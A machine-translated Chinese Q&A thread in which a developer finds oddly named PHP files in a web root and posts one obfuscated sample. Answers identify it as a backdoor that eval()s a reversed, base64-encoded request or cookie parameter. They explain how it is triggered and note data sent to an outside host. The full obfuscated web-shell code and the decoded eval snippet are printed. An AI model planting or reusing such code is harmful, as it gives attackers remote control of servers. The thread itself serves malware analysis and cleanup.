web根目录中奇怪的PHP文件
我在我正在处理的一个场景的web根目录中奇怪的PHP文件,php,apache,malware,Php,Apache,Malware,我在我正在处理的一个场景的public\uhtml目录中发现了几个奇怪的文件。我叫他们奇怪是因为: 它们被命名为wolakfie.php,txvepdhxy.php,等等 它们包含看似无用的代码——不明显是恶意的,但肯定是可疑的 我没有把它们放在那里 现在,我不是第一个在这个网站上工作的开发者,所以理论上他们可以在过去做一些事情。以下是其中一个文件的内容示例: <?php $immanuel='JP';$armory='[L[r=t_ii';$forehead='e';$a
public\uhtmlwolakfie.phptxvepdhxy.php <?php
$immanuel='JP';$armory='[L[r=t_ii';$forehead='e';$avowal ='G$I(P'; $hewett ='r';$blockading='c'; $folly= ' '; $balking='c';$caste= '$'; $aspirate ='?ca=R';$hegemony =')t,)aRo]';
$closing = 'e'; $knell ='epI$';
$delays ='R';$authors ='t';
$immortal ='r'; $displace='S'; $decomposition = 's'; $bastard = 'S';$aurelia='G'; $bisexual= 'H'; $canteen='R';$cager = 'O'; $lorain= 'r]Ogp$';$branden = 'r'; $durant ='(';$lacquered='?gD)(<ls$';$dreamt = '[tPv';$earls ='N;o")(_('; $flowing = 'o';$lactate =';'; $cabaret = 'ri"g)sEyr';
$censor = '@';
$asparagus= 'T""';
$graying= 'leopua';
$casper = 'e';$kiah='sraKTO';$become = 'CiiS';$flak= ':';
$madmax='_n(H';$economizing= 'Egf$v'; $clatter = 'O';
$indolently = '(';$interconnection= 'd';
$indefinite= 'n'; $georgina='veno';
$deviate ='v'; $appropriating='i'; $cocksure= 'oO,)AmHsa';$efface= '(sisL_]e';$influences='U'; $inched='F';$juxtaposes= 'a'; $jenna='Oc6reetO';
$colly= 'S';$corundum = '=i"PEosLE';
$icebergs ='f';$birchen= 'pP'; $brainwashes= 'QH))__';
$decoded ='tB$eTgod';$brooding= 'V';$equipoise = ':;_(eely';
$indignation='[';$brooks ='dQCohi_b'; $directing= '"';$inspirer= 'h';$gypping ='aOra)E';
$courier= '$'; $korey = 'e';$dropping= 'G'; $difficulties = ')';
$creature='K';
$blindfold = 'sa_T';
$dune ='r'; $badger= 'Hl(u'; $imagen = 'E'; $grasp = 'T';$apace='a';
$hunter= '$)4]';
$derision =';';$excoriate = 't';$auditor= '?';
$gecko='_(a';$checkbook = 'MSee$>s'; $foursome ='O_""'; $eben= $jenna['1'] .
$dune.$checkbook[3]. $gecko['2'] . $excoriate.
$checkbook[3] . $foursome['1'] . $icebergs. $badger['3'] .
$georgina['2']. $jenna['1'] .$excoriate. $brooks['5'].$brooks['3'] . $georgina['2'] ;$delano =$folly ;$blanching= $eben ($delano,$checkbook[3]. $deviate . $gecko['2'].$badger['1'] .
$gecko['1'] .$gecko['2'].$dune.$dune. $gecko['2'] .$equipoise['7'].$foursome['1'] . $birchen['0'] . $brooks['3'] .
$birchen['0']. $gecko['1'].
$icebergs.$badger['3'] .
$georgina['2'] .
$jenna['1'] .$foursome['1']. $decoded['5'] . $checkbook[3] .
$auditor ,
$excoriate.$foursome['1'].
$gecko['2'] .$dune.$decoded['5']. $checkbook[6] .
$gecko['1'] .$hunter['1'].
$hunter['1'] . $hunter['1'] .
$derision ); $blanching ($auditor,$cocksure['2'] , $evered['5'] ,
$fineness,
$baths['5'] ,$checkbook['4'], $cocksure['4'] ,
$brooks['7'] ,
$checkbook['4'].
$brooks['5'].$corundum['0'] .
$gecko['2'] .$dune. $dune .$gecko['2'] .$equipoise['7'] . $foursome['1'] .$cocksure['5'].$checkbook[3]. $dune. $decoded['5'] .
$checkbook[3].$gecko['1'].
$checkbook['4'] . $foursome['1']. $canteen .$imagen.
$brooks[1].$influences.
$imagen. $checkbook['1']. $grasp . $cocksure['2'].$checkbook['4'] . $foursome['1'] .$brooks['2'] . $foursome[0] .$foursome[0] .$creature. $knell['2'].$imagen . $cocksure['2'].$checkbook['4'].$foursome['1'] . $checkbook['1'] . $imagen .
$canteen. $brooding.$imagen. $canteen . $hunter['1'] . $derision.
$checkbook['4'].$gecko['2']. $corundum['0']. $brooks['5'].
$checkbook[6] . $checkbook[6] . $checkbook[3].$excoriate .$gecko['1']. $checkbook['4'] .$brooks['5']. $indignation.
$foursome['3']. $checkbook[6].$brooks['3'] . $brooks['3'] .$brooks['3'] .$badger['1'].$birchen['0']. $inspirer .$decoded['5'] .$foursome['3']. $hunter['3'].$hunter['1'] . $auditor . $checkbook['4'] . $brooks['5'] .
$indignation. $foursome['3']. $checkbook[6] .$brooks['3'].$brooks['3'].$brooks['3'] .$badger['1'].$birchen['0'] .
$inspirer . $decoded['5'].$foursome['3'] . $hunter['3'] .
$equipoise['0'] .
$gecko['1'].$brooks['5'].$checkbook[6] . $checkbook[6].$checkbook[3] . $excoriate. $gecko['1'] . $checkbook['4']. $brooks['5']. $indignation.
$foursome['3'] . $badger[0].
$grasp.$grasp .
$birchen['1'] .
$foursome['1'] . $checkbook['1'] . $foursome[0] .$foursome[0]. $foursome[0]. $corundum['7'] .$birchen['1'].
$badger[0].$dropping .$foursome['3']. $hunter['3']. $hunter['1']. $auditor .$checkbook['4'].
$brooks['5'].
$indignation.$foursome['3'] .
$badger[0] .$grasp .$grasp .
$birchen['1'] .$foursome['1'] .$checkbook['1'].$foursome[0] .$foursome[0] .$foursome[0].$corundum['7'] . $birchen['1'] .$badger[0] .
$dropping .$foursome['3'] . $hunter['3']. $equipoise['0']. $brooks['0'].$brooks['5']. $checkbook[3].$hunter['1'] .
$derision .$checkbook[3].
$deviate.$gecko['2'].$badger['1'] . $gecko['1'] .$checkbook[6]. $excoriate . $dune.$dune.$checkbook[3]. $deviate. $gecko['1'] .
$brooks['7'].
$gecko['2']. $checkbook[6] .$checkbook[3].$jenna['2'] . $hunter['2'].$foursome['1'] .
$brooks['0'] .
$checkbook[3].$jenna['1'] .$brooks['3'] .$brooks['0'].
$checkbook[3].$gecko['1'] .$checkbook[6]. $excoriate. $dune .$dune.
$checkbook[3] . $deviate.
$gecko['1'] .$checkbook['4']. $gecko['2'] . $hunter['1'].
$hunter['1'].
$hunter['1'] .
$hunter['1'] .$derision );
它们包含看似无用的代码——不明显是恶意的,但肯定是可疑的
他们非常恶毒。
来自第一个代码的相关位:
$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["sooolphg"])?$i["sooolphg"]:(isset($i["HTTP_SOOOLPHG"])?
$i["HTTP_SOOOLPHG"] : die);
eval(strrev(base64_decode(strrev($a))));
它可以通过请求参数或URL查询字符串传递几乎任何负载。因此,任何发出请求(如filename.php?sooolphg=1&HTTP_SOOLPHG=shellAccessEasilyHere
)的人都可以通过有效负载eval
ed来获得访问权限。参数shellAccessEasilyHere
是一个命令字符串-反转,然后base64 ed,最后再次反转。类似于==qzjh2bgicslxgbvbyvjhbkjyo
的东西会回应“Hello World”
你可以在这里看到另一个脚本中的代码(出于明显的原因,我不在这里发布):ideone.com/sUCJee
删除所有受感染的文件后,您就安全了。确保感染没有进入你自己的文件
幸好你从git中提取了未受感染的(确保它确实是这样)版本。里面有很多评估,只是模糊了。你被黑客攻击了。这是被评估的代码:通过读取代码,数据被发送到f.ggjacktest.com
。您还应该查看O.S.的临时目录。它似乎是在那里创建的文件。来自第一个代码的相关位:$i=array\u merge($\u请求,$\u COOKIE,$\u服务器)$a=isset($i[“sooolphg”])?$i[“sooolphg”]:(isset($i[“HTTP\u sooolphg”)?$i[“HTTP\u sooolphg”]:死);评估(STREV(基本64_解码(STREV($a)))它可以通过请求参数或URL查询字符串传递几乎任何内容。您的第一个错误是使用Godaddy托管。正如我在评论中所说的。谢谢这可能会让我付出很多工作;但看起来不会太多,不客气。是的,这就是为什么定期备份很重要。